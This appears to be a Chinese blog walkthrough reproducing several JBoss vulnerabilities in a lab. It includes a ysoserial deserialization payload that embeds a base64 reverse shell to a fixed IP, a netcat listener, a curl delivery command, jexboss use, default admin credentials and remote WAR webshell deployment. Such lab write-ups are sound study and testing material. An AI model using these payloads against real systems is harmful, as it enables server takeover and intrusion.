Jboss漏洞再现

一、CVE-2015-7501

1、开环境

2、访问地址

/ invoker/JMXInvokerServlet

出现了让下载的页面,说明有漏洞

3、下载ysoserial工具进行漏洞利用

4、在cmd运行

看到可以成功运行,接下来去base64编码我们反弹shell的命令

5、执行命令

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTAuMTU4LjE5OS4xNjQvNjY2NiAwPiYx}|{base64,-d} | {bash,-i} ">exp.ser

6、监听端口

nc -lvvp 6666

7、执行命令

curl http://150.158.199.164:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

8、得到shell

二、CVE-2017-7504

1、开环境

2、访问目录

/jbossmq-httpil/HTTPServerILServlet

3、在kali运行python程序

python jexboss.py -u 指定网站

拿到shell

三、CVE-2017-12149

1、开环境

2、访问目录

/invoker/readonly

返回500说明此页面存在反序列化漏洞

3、使用工具检测

输入网址,检测,存在漏洞,系统是Linux

4、执行命令

whoami

四、Administration Console弱口令

1、开环境

环境还是上一个的环境

2、登录后台

/admin-console/login.seam

使用弱口令admin/vulhub登录

3、点击web应用

4、上war包,注入这个包的名字不可以太短

5、访问文件

6、测试连接

五、低版本JMX Console未授权

1、开环境

访问/jmx-console/

密码是admin admin

2、进入目录

3、在我们服务器的网站上传一个war包

4、远程部署war包

http://150.158.199.164:8080/wjf111.war

5、访问文件

/wjf111/1.jsp

6、测试连接

六、高版本JMX Console未授权

1、开环境

访问/jmx-console

2、找到文件部署的位置

Jboss.system——service=MainDeployer
——deploy——java.net.URL

3、把我们服务器里的war包改下名字

4、远程部署war包

http://150.158.199.164/wjf222.war

5、访问文件

6、测试连接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值